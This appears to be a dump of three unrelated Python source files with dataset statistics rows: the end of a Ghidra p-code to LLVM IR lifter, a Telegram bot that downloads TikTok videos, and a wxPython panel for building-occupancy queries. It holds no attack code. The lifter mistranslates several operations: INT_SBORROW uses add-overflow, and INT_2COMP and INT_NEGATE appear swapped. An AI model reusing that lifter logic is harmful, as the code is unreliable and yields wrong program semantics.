input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
lhs = fetch_input_varnode(builder, input_0)
rhs = fetch_input_varnode(builder, input_1)
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
if input_0.text in pointers and input_1.get("storage") == "constant":
result = builder.gep(lhs, [ir.Constant(int64, int(input_1.text, 16))])
else:
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
result = builder.add(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SUB":
input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
lhs = fetch_input_varnode(builder, input_0)
rhs = fetch_input_varnode(builder, input_1)
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
if input_0.text in pointers and input_1.get("storage") == "constant":
result = builder.gep(lhs, [ir.Constant(int64, -int(input_1.text, 16))])
else:
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
result = builder.sub(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_CARRY":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.uadd_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SCARRY":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.sadd_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SBORROW":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.sadd_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_2COMP":
val = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.not_(val)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_NEGATE":
val = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.neg(val)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_XOR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.xor(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_AND":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.and_(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_OR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.or_(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_LEFT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.shl(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_RIGHT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.lshr(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SRIGHT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.ashr(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_MULT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.mul(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_DIV":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.div(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_REM":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.urem(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SDIV":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.sdiv(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SREM":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.srem(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "BOOL_NEGATE":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.neg(lhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_XOR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.xor(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_AND":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.and_(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_OR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.or_(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "FLOAT_EQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NOTEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_LESS":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_LESSEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ADD":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_SUB":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_MULT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_DIV":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NEG":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ABS":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_SQRT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_CEIL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_FLOOR":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ROUND":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NAN":
raise Exception("Not implemented")
elif mnemonic.text == "INT2FLOAT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT2FLOAT":
raise Exception("Not implemented")
elif mnemonic.text == "TRUNC":
raise Exception("Not implemented")
elif mnemonic.text == "CPOOLREF":
raise Exception("Not implemented")
elif mnemonic.text == "NEW":
raise Exception("Not implemented")
elif mnemonic.text == "MULTIEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "INDIRECT":
raise Exception("Not implemented")
elif mnemonic.text == "PTRADD":
raise Exception("Not implemented")
elif mnemonic.text == "PTRSUB":
raise Exception("Not implemented")
elif mnemonic.text == "CAST":
raise Exception("Not implemented")
else:
raise Exception("Not a standard pcode instruction")
block_iterator += 1
instr += 1
if block_iterator < len(blocks) and no_branch:
builder.branch(list(blocks.values())[block_iterator])
def fetch_input_varnode(builder, name):
var_type = name.get("storage")
var_size = int(name.get("size")) * 8
if var_type == "register":
return builder.load(registers[name.text])
elif var_type == "unique":
if name.text not in list(uniques.keys()):
raise Exception("Temporary variable referenced before defined")
return uniques[name.text]
elif var_type == "constant":
var = ir.Constant(ir.IntType(var_size), int(name.text, 0))
return var
elif var_type == "memory":
return memory[name.text]
def update_output(builder, name, output):
var_type = name.get("storage")
if var_type == "register":
reg = registers[name.text]
if reg.type != output.type.as_pointer():
reg = builder.bitcast(reg, output.type.as_pointer())
builder.store(output, reg)
elif var_type == "unique":
uniques[name.text] = output
def fetch_output_varnode(name):
var_type = name.get("storage")
if var_type == "register":
return registers[name.text]
elif var_type == "unique":
if name.text not in uniques:
uniques[name.text] = None
return uniques[name.text]
def int_check_inputs(builder, lhs, rhs, target):
if lhs.type != target:
if lhs.type.is_pointer:
lhs2 = lhs
lhs = builder.ptrtoint(lhs, target)
if lhs2 == rhs:
rhs = lhs
if rhs.type != target and lhs != rhs:
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, target)
return lhs, rhs
def check_shift_inputs(builder, lhs, rhs, target):
if lhs.type != target:
if lhs.type.is_pointer:
lhs = builder.ptrtoint(lhs, target)
else:
lhs = builder.zext(lhs, target)
if rhs.type != target:
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, target)
else:
rhs = builder.zext(rhs, target)
return lhs, rhs
def int_comparison_check_inputs(builder, lhs, rhs):
# For integer comparison operations. We assume rhs is the correct type.
if lhs.type.is_pointer:
lhs = builder.ptrtoint(lhs, rhs.type)
return lhs, rhs
| 49.932331
| 118
| 0.571074
| 3,003
| 26,564
| 4.885115
| 0.084582
| 0.07362
| 0.092706
| 0.101431
| 0.730539
| 0.675596
| 0.651738
| 0.599932
| 0.537014
| 0.510907
| 0
| 0.010864
| 0.306994
| 26,564
| 532
| 119
| 49.932331
| 0.786029
| 0.012686
| 0
| 0.46856
| 0
| 0
| 0.094969
| 0.002403
| 0
| 0
| 0.000114
| 0
| 0
| 1
| 0.022312
| false
| 0.002028
| 0.004057
| 0
| 0.052738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dfc52594a99b2ee5b9d8578f257b3fdecb0fcf
| 4,726
|
py
|
Python
|
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
import json, requests, os, shlex, asyncio, uuid, shutil
from typing import Tuple
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery
# Configs
API_HASH = os.environ['API_HASH']
APP_ID = int(os.environ['APP_ID'])
BOT_TOKEN = os.environ['BOT_TOKEN']
downloads = './downloads/{}/'
#Button
START_BUTTONS=[
[
InlineKeyboardButton('Source', url='https://github.com/X-Gorn/TikTokDL'),
InlineKeyboardButton('Project Channel', url='https://t.me/xTeamBots'),
],
[InlineKeyboardButton('Author', url='https://t.me/xgorn')],
]
DL_BUTTONS=[
[
InlineKeyboardButton('No Watermark', callback_data='nowm'),
InlineKeyboardButton('Watermark', callback_data='wm'),
],
[InlineKeyboardButton('Audio', callback_data='audio')],
]
# Running bot
xbot = Client('TikTokDL', api_id=APP_ID, api_hash=API_HASH, bot_token=BOT_TOKEN)
# Helpers
# Thanks to FridayUB
async def run_cmd(cmd: str) -> Tuple[str, str, int, int]:
args = shlex.split(cmd)
process = await asyncio.create_subprocess_exec(
*args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
return (
stdout.decode("utf-8", "replace").strip(),
stderr.decode("utf-8", "replace").strip(),
process.returncode,
process.pid,
)
# Start
@xbot.on_message(filters.command('start') & filters.private)
async def _start(bot, update):
await update.reply_text(f"I'm TikTokDL!\nYou can download tiktok video/audio using this bot", True, reply_markup=InlineKeyboardMarkup(START_BUTTONS))
# Downloader for tiktok
@xbot.on_message(filters.regex(pattern='.*http.*') & filters.private)
async def _tiktok(bot, update):
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if not 'tiktok.com' in resp.url:
return
await update.reply('Select the options below', True, reply_markup=InlineKeyboardMarkup(DL_BUTTONS))
# Callbacks
@xbot.on_callback_query()
async def _callbacks(bot, cb: CallbackQuery):
if cb.data == 'nowm':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
result = r.text
rs = json.loads(result)
link = rs['result']['nowm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
open(f'{ttid}.mp4', 'wb').write(r.content)
await bot.send_video(update.chat.id, f'{ttid}.mp4',)
shutil.rmtree(dirs)
elif cb.data == 'wm':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
result = r.text
rs = json.loads(result)
link = rs['result']['wm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
open(f'{ttid}.mp4', 'wb').write(r.content)
await bot.send_video(update.chat.id, f'{ttid}.mp4',)
shutil.rmtree(dirs)
elif cb.data == 'audio':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
result = r.text
rs = json.loads(result)
link = rs['result']['wm']
resp = session.head(link, allow_redirects=True)
r = requests.get(resp.url, allow_redirects=True)
open(f'{ttid}.mp4', 'wb').write(r.content)
cmd = f'ffmpeg -i "{ttid}.mp4" -vn -ar 44100 -ac 2 -ab 192 -f mp3 "{ttid}.mp3"'
await run_cmd(cmd)
await bot.send_audio(update.chat.id, f'{ttid}.mp3',)
shutil.rmtree(dirs)
xbot.run()
| 33.757143
| 152
| 0.643039
| 634
| 4,726
| 4.711356
| 0.252366
| 0.030465
| 0.060261
| 0.049213
| 0.504185
| 0.483763
| 0.483763
| 0.483763
| 0.483763
| 0.483763
| 0
| 0.008463
| 0.199958
| 4,726
| 139
| 153
| 34
| 0.781539
| 0.019044
| 0
| 0.575
| 0
| 0.008333
| 0.139929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.033333
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e12ba6cbfd755e451e70540ba00bbbd7d6bc8c
| 24,254
|
py
|
Python
|
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | null | null | null |
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | 8
|
2021-03-19T01:36:06.000Z
|
2022-03-12T00:22:43.000Z
|
frontend-gui/rpanel.py
|
skyu0221/660-iot
|
d31f973c93871bfa8122f1b83364d0147d402e9e
|
[
"Apache-2.0"
] | null | null | null |
import wx
import wx.adv
import random
import util
import config
import time
import datetime
import threading
import requests
import json
from functools import partial
class ReqeusterThread(threading.Thread):
# https://www.oreilly.com/library/view/python-cookbook/0596001673/ch06s03.html
def __init__(self, name, parent_thread, parent_panel):
threading.Thread.__init__(self, name=name)
self._stopevent = threading.Event()
self.parent_panel = parent_panel
self.parent_thread = parent_thread
def run(self):
while (not self._stopevent.is_set()) and self.parent_thread.is_alive():
print("hello")
# print(self.parent_panel.info_widget_dict)
# print(self.parent_panel.info)
# chnage to real time
end = datetime.datetime.now()
start = end - datetime.timedelta(minutes=1)
self.parent_panel.info["start"] = util.convert_to_GMT_zone(start)
self.parent_panel.info["end"] = util.convert_to_GMT_zone(end)
self.parent_panel._send_request(self.parent_panel.info)
self._stopevent.wait(5.0)
def join(self, timeout=None):
self._stopevent.set()
print("thread stop")
threading.Thread.join(self, timeout)
class RightPanel(wx.Panel):
def __init__(self, parent, info={}):
wx.Panel.__init__(self, parent=parent)
self.drop_down_menu_ID = None
self.result_visual_ID = None
self.info = info
self._init_UI()
def _init_UI(self):
self.SetBackgroundColour("#BAB86C")
font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(20)
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
# add question label
st1 = wx.StaticText(self, label='Question')
st1.SetFont(font)
hbox1.Add(st1, proportion=2, flag=wx.RIGHT, border=10)
# add drop down menu
question_list = [
"1. How many people are in the building?",
"2. How many people are in a specific room?",
"3. Where is someone?",
# "4. Which room has someone visited?",
"4. What is the utilization of a specific room?"
]
drop_down_menu = wx.ComboBox(self, choices=question_list)
hbox1.Add(drop_down_menu, proportion=8, flag=wx.TOP, border=5)
vbox1 = wx.BoxSizer(wx.VERTICAL)
# add result label
# st2 = wx.StaticText(self, label='Result')
# st2.SetFont(font)
# vbox1.Add(st2, proportion=1, flag=wx.ALIGN_CENTER, border=1)
# add canvas panel
# canvas_panel = CanvasPanel(self)
# vbox1.Add(canvas_panel, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
result_panel = ResultPanel(self)
# result_panel.SetBackgroundColour("#000000")
vbox1.Add(result_panel, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
vbox.Add(hbox1, proportion=1, flag=wx.EXPAND|wx.ALL, border=10)
vbox.Add(vbox1, proportion=9, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, border=10)
self.SetSizer(vbox)
# listen combo
drop_down_menu.Bind(wx.EVT_COMBOBOX, partial(self.on_selection,
combo_box=drop_down_menu,
panel=result_panel))
def on_selection(self, event, combo_box, panel):
# print(self.drop_down_menu.GetValue())
print(combo_box.GetValue())
panel.init_question_UI(combo_box.GetValue()[0])
# st2 = wx.StaticText(self, label=combo_box.GetValue())
# st2.SetFont(font)
# sizer1.Add(st2, proportion=1, flag=wx.ALIGN_CENTER, border=1)
class ResultPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# self._init_UI()
self._q_dict = {"1": self._q1_panel,
"2": self._q2_panel,
"3": self._q3_panel,
# "4": self._q4_panel,
"4": self._q5_panel,}
self.info_widget_dict = {"feeder": {}, "consumer": {}}
self.worker = None
self.server = config.SERVER
self._set_font()
def _set_font(self):
self.font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
self.font.SetPointSize(12)
self.font.MakeBold()
def init_question_UI(self, q_idx):
# clean the panel
for child in self.GetChildren():
child.Destroy()
# stop the worker
if self.worker:
# print("the worker has been stop")
self.worker.join()
self.worker = None
self.info_widget_dict["feeder"].clear()
self.info_widget_dict["consumer"].clear()
decorate_panel = self._q_dict[q_idx]
decorate_panel()
def add_date_time_picker_layout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
# Start
start_label = wx.StaticText(self, label="START TIME")
start_label.SetFont(self.font)
dpc1 = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc1 = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
hbox1.Add(start_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox1.Add(dpc1, proportion=3, flag=wx.RIGHT, border=5)
hbox1.Add(tpc1, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(hbox1, proportion=0, flag=wx.ALL, border=5)
# End
end_label = wx.StaticText(self, label="END TIME")
end_label.SetFont(self.font)
dpc2 = wx.adv.DatePickerCtrl(self, -1, wx.DefaultDateTime)
tpc2 = wx.adv.TimePickerCtrl(self, -1, wx.DefaultDateTime)
hbox2.Add(end_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox2.Add(dpc2, proportion=3, flag=wx.RIGHT, border=5)
hbox2.Add(tpc2, proportion=3, flag=wx.RIGHT, border=5)
vbox.Add(hbox2, proportion=0, flag=wx.ALL, border=5)
# Real time box
real_label = wx.StaticText(self, label="REAL TIME")
real_label.SetFont(self.font)
cb = wx.CheckBox(self)
hbox3.Add(real_label, proportion=2, flag=wx.RIGHT|wx.TOP, border=4)
hbox3.Add(cb, proportion=3, flag=wx.RIGHT|wx.TOP, border=5)
vbox.Add(hbox3, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["feeder"]["start_date"] = dpc1
self.info_widget_dict["feeder"]["start_time"] = tpc1
self.info_widget_dict["feeder"]["end_date"] = dpc2
self.info_widget_dict["feeder"]["end_time"] = tpc2
self.info_widget_dict["feeder"]["real_time"] = cb
# self.SetBackgroundColour("#000000")
# r = lambda: random.randint(0,255)
# color = '#%02X%02X%02X' % (r(),r(),r())
return vbox
def _add_confirm_button(self, sizer, question_index):
"""
question_index => {1, 2, 3, 4}
"""
comfirm_btn = wx.Button(self, id=-1, label="Confirm")
sizer.Add(comfirm_btn, proportion=0, flag=wx.TOP|wx.LEFT, border=5)
# self.Bind(wx.EVT_BUTTON, self.OnClick, comfirm_btn)
self.Bind(wx.EVT_BUTTON, lambda event: self.OnClick(event, question_index), comfirm_btn)
def _add_result_label(self, sizer):
result_label = wx.StaticText(self, label="RESULT")
font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(20)
font.MakeBold()
result_label.SetFont(font)
sizer.Add(result_label, proportion=0, flag=wx.ALIGN_CENTER_HORIZONTAL, border=20)
def OnClick(self, event, question_index):
info = {}
# handle date and time
if question_index in [1, 2, 3, 4]:
start_date = self.info_widget_dict["feeder"]["start_date"].GetValue()
start_time = self.info_widget_dict["feeder"]["start_time"].GetValue()
end_date = self.info_widget_dict["feeder"]["end_date"].GetValue()
end_time = self.info_widget_dict["feeder"]["end_time"].GetValue()
info["start"] = util.combine_datetime(start_date, start_time)
info["end"] = util.combine_datetime(end_date, end_time)
# print("start time = {}".format(info["start"]))
# print("end time = {}".format(info["end"]))
if_real_time = self.info_widget_dict["feeder"]["real_time"].GetValue()
if question_index == 1:
# requester send request to server
pass
elif question_index == 2:
# requester send request to server
room = self.info_widget_dict["feeder"]["room_select"].GetValue()
print(room)
info["room"] = room
elif question_index == 3:
# requester send request to server
name = self.info_widget_dict["feeder"]["name_select"].GetValue()
print(name)
info["name"] = name
else: # question_index = 4
name = self.info_widget_dict["feeder"]["name_select"].GetValue()
print(name)
info["name"] = name
else: # question_index == 5
if_real_time = False
date = self.info_widget_dict["feeder"]["date_picker"].GetValue()
time = self.info_widget_dict["feeder"]["time_picker"].GetValue()
room = self.info_widget_dict["feeder"]["room_select"].GetValue()
info["date"] = util.combine_datetime(date, time)
info["room"] = room
# requester send request to server
info["question_index"] = question_index
self.info = info
if if_real_time:
if not self.worker:
self.worker = ReqeusterThread(name="question_{}_requester".format(question_index), parent_thread=threading.currentThread(), parent_panel=self)
self.worker.start()
print("start worker")
else:
# first check if the worker is working
if self.worker:
self.worker.join()
self.worker = None
self._send_request(info)
def _request_handle(self, url, body={}, params={}, METHOD="post"):
# https://stackoverflow.com/questions/15900338/python-request-post-with-param-data
print("url", url)
print("body", body)
print("params", params)
resp = {}
if METHOD == "post":
r = requests.post(url, data=body)
else:
r = requests.get(url, params=params)
print(r.status_code)
if r.status_code == 200:
resp = r.json()
print(resp)
print(type(resp))
return resp
def _send_request(self, info):
question_index = int(info["question_index"])
if question_index == 1:
## get ##
url = self.server + "/people_building/"
body = {"start": info["start"], "end": info["end"]}
# body = {'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
occu = str(response['count'])
except:
occu = str(0)
## received##
self.info_widget_dict["consumer"]["occu_label"].SetLabel(occu)
elif question_index == 2:
## get ##
url = self.server + "/people_room/"
body = {"room": info["room"],
"start": info["start"],
"end": info["end"],
# 'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
occu = str(response['count'])
occupancy_info = response['occupancy_info']
except:
occu = str(0)
occupancy_info = []
## received ##
self.info_widget_dict["consumer"]["occu_label"].SetLabel(occu)
nlb = self.info_widget_dict["consumer"]["name_list"]
nlb.Clear()
for name in occupancy_info:
nlb.Append(name)
elif question_index == 3:
## get ##
url = self.server + "/person_room/"
body = {"name": info["name"],
"start": info["start"],
"end": info["end"],
# 'start': '2020-04-05 21:00:00', 'end': '2020-04-05 21:10:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
try:
room_list = response['room']
count = str(len(room_list))
except:
count = str(0)
room_list = []
## received ##
self.info_widget_dict["consumer"]["count_label"].SetLabel(count)
rlb = self.info_widget_dict["consumer"]["room_list"]
rlb.Clear()
for name in room_list:
rlb.Append(name)
elif question_index == 4:
## get ##
url = self.server + "question/4"
body = {"name": info["name"],
# "start_time": info["start"],
# "end_time": info["end"],
"time": info["start"],
}
response = self._request_handle(url=url, body=body, METHOD="post")
count = str(random.randint(0, 20))
room_list = ["Room_1_1_140", "Room_1_1_141"]
## received ##
self.info_widget_dict["consumer"]["count_label"].SetLabel(count)
rlb = self.info_widget_dict["consumer"]["room_list"]
rlb.Clear()
for name in room_list:
rlb.Append(name)
elif question_index == 5:
## get ##
url = self.server + "/utilization/"
body = {"room": info["room"],
"date": info["date"],
# 'date': '2020-04-05 20:00:00'
}
response = self._request_handle(url=url, body=body, METHOD="post")
# self.request_handle(url, body, METHOD="post")
try:
response = json.loads(response)
utilization = "{:.2f}".format(response["utilization"]*100) + "%"
except:
utilization = "0%"
## received##
self.info_widget_dict["consumer"]["utilization_label"].SetLabel(utilization)
def _q1_panel(self):
print("q1")
main_vbox = self.add_date_time_picker_layout()
# confirm button
self._add_confirm_button(main_vbox, 1)
# add result label
self._add_result_label(main_vbox)
# add result widget
hbox = wx.BoxSizer(wx.HORIZONTAL)
label = wx.StaticText(self, label="Occupancy")
label.SetFont(self.font)
hbox.Add(label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
occu_label = wx.StaticText(self, label="__")
occu_label.SetFont(self.font)
hbox.Add(occu_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
main_vbox.Add(hbox, proportion=0, flag=wx.ALL, border=5)
self.info_widget_dict["consumer"]["occu_label"] = occu_label
self.SetSizer(main_vbox)
# https://stackoverflow.com/questions/42365239/wxpython-after-changing-panel-and-redo-layout-panel-is-very-small
self.Fit()
self.GetParent().SendSizeEvent()
def _q2_panel(self):
print("q2")
main_vbox = self.add_date_time_picker_layout()
# Room Info
room_hbox = wx.BoxSizer(wx.HORIZONTAL)
room_label = wx.StaticText(self, label="Room")
room_label.SetFont(self.font)
room_hbox.Add(room_label, proportion=2, flag=wx.TOP|wx.RIGHT, border=5)
room_list = [
"",
"Room_1_1_140",
"Room_1_1_141",
"Room_1_1_142",
"Room_1_1_143",
"Room_1_1_144",
"Room_1_1_150",
"Room_1_1_184"]
room_combobox = wx.ComboBox(self, choices=room_list)
room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
# room_info = wx.TextCtrl(self)
# room_hbox.Add(room_combobox, proportion=8, flag=wx.TOP, border=5)
main_vbox.Add(room_hbox, proportion=0, flag=wx.ALL, border=5)
# confirm button
